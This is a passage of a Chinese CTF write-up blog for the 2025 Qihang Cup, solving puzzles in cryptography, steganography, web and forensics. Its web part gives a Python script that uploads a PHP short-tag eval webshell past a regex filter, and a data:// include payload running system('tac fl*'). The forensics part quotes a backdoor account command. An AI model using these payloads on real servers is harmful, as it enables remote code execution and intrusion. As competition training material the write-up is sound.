                        alt="你能看懂这串未知的文字吗.png"
                 ></p>
<p>在贴吧找到羊文对照表</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E7%BE%8A%E6%96%87%E5%AF%B9%E7%85%A7%E8%A1%A8.png"
                        alt="羊文对照表.png"
                 ></p>
<p>翻译之后是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">szfpguw</span><br><span class="line">izgwesq</span><br><span class="line">zoaoerh</span><br></pre></td></tr></table></figure>

<p>但是放到随波逐流里面梭哈没出来，赛后大师傅在群里说是维吉尼亚</p>
<p>lsb隐写</p>
<p>b1,rgb,lsb,xy .. text: “qihangbeiiseasy”</p>
<p>然后在用随波逐流维吉尼亚解密就完美解出</p>
<p><code>cryptoveryeasybysheeb</code></p>
<p>包上{}和flag就行</p>
<h3 id="PvzHE"><a href="#PvzHE" class="headerlink" title="PvzHE"></a>PvzHE</h3><p>这个是植物大战僵尸的那个pvz是Demon做的，进去直接找到images</p>
<p>有一个图片直接就是flag</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/ZombieNote1.png"
                        alt="ZombieNote1.png"
                 ></p>
<h3 id="猿类的编程语言你了解吗"><a href="#猿类的编程语言你了解吗" class="headerlink" title="猿类的编程语言你了解吗"></a>猿类的编程语言你了解吗</h3><p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E7%8C%BF%E7%B1%BB%E7%9A%84%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80%E4%BD%A0%E4%BA%86%E8%A7%A3%E5%90%97.jpg"
                        alt="猿类的编程语言你了解吗.jpg"
                 ></p>
<p>用jphs这个工具，但是以前没接触过图片还有这个方向的东西，后来在我的不知道哪个老学长祖传下来的工具包里面就搜到了</p>
<p>但是要密码我不知道在哪，等着官方wp下来之后在看看吧，(根本没秘密我真服了，但是我鼠标点击就报错，回车就行了)导出这个hide之后是ook解密这题比较misc有点好玩</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.. .. .. .. .. .. .. .. .. .. !? .? .. .? .. .. .. .? .. .. .. .. .. .. .. .? .. .. .. .. .. .. .. .. .. .. ?. ?. ?. ?. !! ?! .? .? .? .. .. .. .. .. .. .. .. .. .. .. !. !! !! !! !! !! !! !! !! !! !. !! !! !! !! !! !. .? !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !. ?. .. .. .. !. .? .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !. ?. ?. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !. .? .? !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !. ?. ?. .. .. .. !. !. .? .? !. ?. ?. !! !! !! !! !! !. .? .? .. !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !. .? .? !! !! !! !! !. ?. ?. .. .. .. .. .. .. .. .. !. .? .? !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !! !! !! !! !! !. .. .. .. .. .. .. .. !. !! !! !! !! !. .? .? .. .. .. .. !. !! !! !! !! !. ?. ?. !! !! !! !. .. .. .. .. .. .. .. .. .. .. .. !. !! !! !! !! !! !! !! !! !. .? .? .. .. .. .. .. !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !. .? .? !! !! !! !! !. .. !. ?. ?. .. .. .. .. .. .. !. .. .. .. !. !! !! !! !! !! !! !. .. .. .. !. .? .? !! !! !. ?. ?. !! !! !! !. .? .? .. .. .. .. !. !! !! !! !! !. ?. ?. .. .. .. !. .. .. .. .. .. .. !. .? .? .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !.</span><br></pre></td></tr></table></figure>

<p>ook解密<a class="link"   target="_blank" rel="noopener" href="https://www.splitbrain.org/services/ook" >https://www.splitbrain.org/services/ook<i class="fas fa-external-link-alt"></i></a>直接梭哈了</p>
<h3 id="启动！"><a href="#启动！" class="headerlink" title="______启动！"></a>______启动！</h3><p>这题是Demon解出的</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E5%90%AF%E5%8A%A81.png"
                        alt="启动1.png"
                 ></p>
<p>找到这个流量包，<img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E5%90%AF%E5%8A%A82.png"
                        alt="启动2.png"
                 ></p>
<p>tcp追踪流</p>
<p>但是Demon是找的ai直接就吐出来了具体解法没给出</p>
<h3 id="QHCTF-For-Year-2025"><a href="#QHCTF-For-Year-2025" class="headerlink" title="QHCTF For Year 2025"></a>QHCTF For Year 2025</h3><p>这个题也是Demon出的根据hint对着日历一个个画出来就能拼出来，不知道为什么这么简单的思路qit那边竟然没人做出来</p>
<p>什么时候qit能来个大爹帮我分担一下压力啊</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hint:</span><br><span class="line">080714212829302316092230-04111825121306132027-0605041118252627-08091009162330-0102031516170108152229-0108142229-0203041617180209162330-0108152229303124171003-231609021725181104-01020917233029</span><br></pre></td></tr></table></figure>

<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E6%97%A5%E5%8E%86.png"
                        alt="日历.png"
                 ></p>
<p>最后拼出来是QHCTF{FUN}这个题没啥意思</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="PCREMagic"><a href="#PCREMagic" class="headerlink" title="PCREMagic"></a>PCREMagic</h3><p>学弟做出来之后给我说是php短标签绕过，然后他写了脚本给我</p>
<p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_php</span>(<span class="params"><span class="variable">$data</span></span>)</span>&#123;</span><br><span class="line">     <span class="keyword">return</span> <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/&lt;\?php.*?eval.*?\(.*?\).*?\?&gt;/is&#x27;</span>, <span class="variable">$data</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$_FILES</span>)) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$user_dir</span> = <span class="string">&#x27;data/&#x27;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">is_php</span>(<span class="variable">$data</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;bad request&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="title function_ invoke__">is_dir</span>(<span class="variable">$user_dir</span>)) &#123;</span><br><span class="line">        <span class="title function_ invoke__">mkdir</span>(<span class="variable">$user_dir</span>, <span class="number">0755</span>, <span class="literal">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$path</span> = <span class="variable">$user_dir</span> . <span class="string">&#x27;/&#x27;</span> . <span class="title function_ invoke__">random_int</span>(<span class="number">0</span>, <span class="number">10</span>) . <span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line">    <span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="variable">$path</span>);</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: <span class="subst">$path</span>&quot;</span>, <span class="literal">true</span>, <span class="number">303</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>学弟做出来之后给我说是php短标签绕过，然后他写了脚本给我</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://challenge.qihangcup.cn:33842/&#x27;</span></span><br><span class="line">file = &#123;<span class="string">&#x27;file&#x27;</span>: (<span class="string">&#x27;1.php&#x27;</span>, <span class="string">&#x27;&lt;?=eval($_POST[1]);?&gt;&#x27;</span>, <span class="string">&#x27;images/png&#x27;</span>)&#125;</span><br><span class="line">res = requests.post(url, files=file, allow_redirects=<span class="literal">False</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;路径: <span class="subst">&#123;url&#125;</span><span class="subst">&#123;res.headers[<span class="string">&#x27;Location&#x27;</span>]&#125;</span> ,木马为：1&quot;</span>)</span><br></pre></td></tr></table></figure>

<p><img  
                       lazyload
                       alt="image"
                       data-src="http://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/PCREMagic-PY.png"
                        alt="PCREMagic-PY.png"
                 ></p>
<p>用蚁剑连接,在根目录下找到flag</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="https://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/%E8%9A%81%E5%89%91.png"
                        alt="蚁剑.png"
                 ></p>
<p>那么这道题对我来说肯定不是这样就得过且过了</p>
<p>开始复盘：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_php</span>(<span class="params"><span class="variable">$data</span></span>)</span>&#123;</span><br><span class="line">     <span class="keyword">return</span> <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/&lt;\?php.*?eval.*?\(.*?\).*?\?&gt;/is&#x27;</span>, <span class="variable">$data</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//这里是一个函数，data传参里面不允许有“/&lt;\?php.*?eval.*?\(.*?\).*?\?&gt;//”is这些东西，把&lt;?php ?&gt;标签ban了</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$_FILES</span>)) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//这段代码的意思是如果$_FILES为空（即没有上传的文件），则执行die(show_source(__FILE__))，这会终止程序执行并输出当前文件的源代码。就是说让你传文件呢！</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$user_dir</span> = <span class="string">&#x27;data/&#x27;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">is_php</span>(<span class="variable">$data</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;bad request&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="title function_ invoke__">is_dir</span>(<span class="variable">$user_dir</span>)) &#123;</span><br><span class="line">        <span class="title function_ invoke__">mkdir</span>(<span class="variable">$user_dir</span>, <span class="number">0755</span>, <span class="literal">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$path</span> = <span class="variable">$user_dir</span> . <span class="string">&#x27;/&#x27;</span> . <span class="title function_ invoke__">random_int</span>(<span class="number">0</span>, <span class="number">10</span>) . <span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line">    <span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="variable">$path</span>);</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: <span class="subst">$path</span>&quot;</span>, <span class="literal">true</span>, <span class="number">303</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>因为把很多东西都ban了 让传文件<?php ?>又不能用，那就用php短标签去写一个小马</p>
<h4 id="php短标签"><a href="#php短标签" class="headerlink" title="php短标签"></a>php短标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php ?&gt;是正和常情况下的标签，用于识别这是个php文件，但php也允许使用短标签&lt;? ?&gt;和&lt;?=  &gt;，可以用于php被过滤的情况下。 &lt;? ?&gt;等价于&lt;?php ?&gt; &lt;?= &gt;等价于&lt;?php echo ?&gt;</span><br><span class="line">举个例子：</span><br><span class="line">&lt;?=&#x27;Hello World&#x27;?&gt;    // 输出 &quot;Hello World&quot;</span><br></pre></td></tr></table></figure>

<p>细细品味一下学弟的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://challenge.qihangcup.cn:33842/&#x27;</span></span><br><span class="line">file = &#123;<span class="string">&#x27;file&#x27;</span>: (<span class="string">&#x27;1.php&#x27;</span>, <span class="string">&#x27;&lt;?=eval($_POST[1]);?&gt;&#x27;</span>, <span class="string">&#x27;images/png&#x27;</span>)&#125;/*建了一个字典，键为 “file”，值是一个元组。元组中第一个元素是字符串 <span class="string">&#x27;1.php&#x27;</span>，代表一个文件名；第二个元素是字符串也就是文件内容，images/png应该是定义成png格式方便绕过吧<span class="string">&#x27;*/</span></span><br><span class="line"><span class="string">res = requests.post(url, files=file, allow_redirects=False)//剩下的就是post传参了</span></span><br><span class="line"><span class="string">print(f&quot;路径: &#123;url&#125;&#123;res.headers[&#x27;</span>Location<span class="string">&#x27;]&#125; ,木马为：1&quot;)//回显蚁剑的连接路径</span></span><br></pre></td></tr></table></figure>



<h3 id="Easy-include"><a href="#Easy-include" class="headerlink" title="Easy_include"></a>Easy_include</h3><p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>); </span><br><span class="line"><span class="comment">//flag in flag.php </span></span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]; </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)) </span><br><span class="line">&#123; </span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/i&quot;</span>,<span class="variable">$file</span>)) </span><br><span class="line">    &#123; </span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">    &#123; </span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;no no no ~ &quot;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">&#123; </span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>一个简单的文件包含，用data伪协议读取</p>
<p>?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?=system('tac fl*');?></p>
<h3 id="Web-IP"><a href="#Web-IP" class="headerlink" title="Web_IP"></a>Web_IP</h3><h2 id="Forensic"><a href="#Forensic" class="headerlink" title="Forensic"></a>Forensic</h2><p>早上起来启航杯平台关了，等着后续平台重启我再去补上Forensic的复现</p>
<p>中午就开放了服了，本来还想歇会，但是我还是拖了两天哈哈根本不想学习。</p>
<p>给出附件（10G）通过网盘分享的文件：启航杯取证.7z<br>链接: <a class="link"   target="_blank" rel="noopener" href="https://pan.baidu.com/s/1xZ3bY58Td-OQ6CqyrVpNAw?pwd=23ch" >https://pan.baidu.com/s/1xZ3bY58Td-OQ6CqyrVpNAw?pwd=23ch<i class="fas fa-external-link-alt"></i></a> 提取码: 23ch</p>
<p>解压密码是90382728-ca22-48e7-8413-61f6438f1b90</p>
<p>关于取证这个题给的是e01文件我只会用ftk进行挂载肯定还有别的方式但是好像要收费</p>
<p>然后由于我把这些乱七八糟的东西基本上都放到D盘里面然后D盘权限只给了可读和可写没有给完全控制导致我一直挂载好也进去不</p>
<p>今天捣鼓的时候突然想着看一眼D盘权限果然解决那就继续看看取证</p>
<p>首先就是<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_32393893/article/details/142825936?fromshare=blogdetail&sharetype=blogdetail&sharerId=142825936&sharerefer=PC&sharesource=2302_79965136&sharefrom=from_link"><strong>FTK挂载</strong></a>，FTK其实就是镜像虚拟仿真用的，FTK挂载到本地你本地就会出现挂载起来的磁盘，在此电脑中就能直接看到然后其实就能够正常访问了应该是这样</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://liang-ww.github.io/images/202501/%E5%90%AF%E8%88%AA%E6%9D%AF/FTK%E6%9C%AC%E5%9C%B0%E6%8C%82%E8%BD%BD.png"
                        alt="FTK本地挂载.png"
                 ></p>
<p>这个时候可以去虚拟机里面搞去仿真，也可以直接本地做题，在这次取证好像win6很难出解，出题人说是因为win6会被杀毒软件杀掉</p>
<h4 id="Win-01"><a href="#Win-01" class="headerlink" title="Win_01"></a>Win_01</h4><p>某天，小明正在某网站进行学习。突然，一位蛤客盯上了他，并向他发送了一封钓鱼邮件。由于小明刚接触网络安全，对钓鱼邮件并不熟悉，他不小心下载并点击了邮件中的附件。当他后来学习到钓鱼邮件的相关知识时，已经为时晚矣。于是，他请求你帮助找出蛤客的痕迹。请你针对附件镜像进行一次应急响应，查找以下flag值。压缩包附件的解压密码为：90382728-ca22-48e7-8413-61f6438f1b90。请以QHCTF{xxxxxxxx}的格式提交结果。</p>
<p>1.找出系统中蛤客的ip地址及端口，提交方式请以QHCTF{md5(127.0.0.1:80)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}</p>
<h4 id="Win-02"><a href="#Win-02" class="headerlink" title="Win_02"></a>Win_02</h4><p>蛤客在控制小明的系统后，创建了一个最高权限的后门账户，请你找出该账户的用户名及密码，提交方式请以QHCTF{md5(user_password)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}</p>
<p>这个控制系统后的操作看C3师傅的笔记能知道一般都是在powershell的记录里面G:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine</p>
<p>也就是这个路径下有一个文件</p>
<p>net user HackY$ 123456 &#x2F;add<br>net user HackY$ &#x2F;de;<br>net user HackY$ &#x2F;del<br>net user HackY$ 123456 &#x2F;add<br>net user HackY$ &#x2F;del</p>
<h4 id="Win-04"><a href="#Win-04" class="headerlink" title="Win_04"></a>Win_04</h4><p>4.蛤客在系统数据库中藏了一些东西，请你找出其中的flag值<br>提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}</p>
<p>这个题是在注册表里面找到的flag</p>
<h4 id="Win-05"><a href="#Win-05" class="headerlink" title="Win_05"></a>Win_05</h4><p>5.小明在找你帮忙之前，喊了他的一位好友帮他先行取证，请你找出他好友远程所使用的软件，并找出控制了多少秒，ip是什么，提交方式请以QHCTF{md5(xxxx_10_127.0.0.1)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}</p>
<h4 id="Win-06"><a href="#Win-06" class="headerlink" title="Win_06"></a>Win_06</h4><p>6.请你找出蛤客在启动项中藏的flag<br> 提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}</p>
<h4 id="Win-07"><a href="#Win-07" class="headerlink" title="Win_07"></a>Win_07</h4><p>蛤客在home目录中存放了一个恶意程序，请你分析该程序，并找到其中的flag值<br>提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}</p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                启航杯WP
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2025/01/25/启航杯WP/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    Author
                </div>
                <div class="content">Lwwww</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    Published
                </div>
                <div class="content">2025-01-25 22:32</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    License
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="Copy copyright info" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/WP-CTF/">-WP -CTF</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="Share to QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="Share to WeChat"
            data-tooltip-img-tip="Scan by WeChat"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="Share to WeiBo"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                
                    

<div class="reward-author-container border-box flex-center">
    <div class="reward-btn border-box flex-center tooltip tooltip-img"
            data-tooltip-img-url="/images/zs.jpg"
            data-tooltip-img-trigger="click"
            data-tooltip-img-style="top: -6px;"
    >
        <i class="fa-solid fa-gift"></i>&nbsp;给亮汪汪买点狗粮吧⋆⋅☆(✪Ω✪)☆⋅⋆
    </div>
</div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/01/29/2024%E5%B9%B4%E7%BB%88%E6%80%BB%E7%BB%93/"
                                   title="2024年终总结"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">2024年终总结</span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/01/23/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8CRCE%EF%BC%88CTFSHOW%EF%BC%89/"
                                   title="命令执行RCE（CTFSHOW）"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">命令执行RCE（CTFSHOW）</span>
                                        <span class="post-nav-item">Next posts</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Easy-RSA"><span class="nav-text">Easy_RSA</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%B7%E6%89%BE%E5%87%BA%E6%8B%8D%E6%91%84%E5%9C%B0%E6%89%80%E5%9C%A8%E4%BD%8D%E7%BD%AE-OSINT"><span class="nav-text">请找出拍摄地所在位置-OSINT</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OSINT-%E4%BD%A0%E7%8C%9C%E7%8C%9C%E8%BF%99%E6%98%AF%E5%93%AA%EF%BC%9F"><span class="nav-text">OSINT-你猜猜这是哪？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%A0%E8%83%BD%E7%9C%8B%E6%87%82%E8%BF%99%E4%B8%B2%E6%9C%AA%E7%9F%A5%E7%9A%84%E6%96%87%E5%AD%97%E5%90%97"><span class="nav-text">你能看懂这串未知的文字吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PvzHE"><span class="nav-text">PvzHE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%BF%E7%B1%BB%E7%9A%84%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80%E4%BD%A0%E4%BA%86%E8%A7%A3%E5%90%97"><span class="nav-text">猿类的编程语言你了解吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8%EF%BC%81"><span class="nav-text">______启动！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#QHCTF-For-Year-2025"><span class="nav-text">QHCTF For Year 2025</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PCREMagic"><span class="nav-text">PCREMagic</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#php%E7%9F%AD%E6%A0%87%E7%AD%BE"><span class="nav-text">php短标签</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Easy-include"><span class="nav-text">Easy_include</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Web-IP"><span 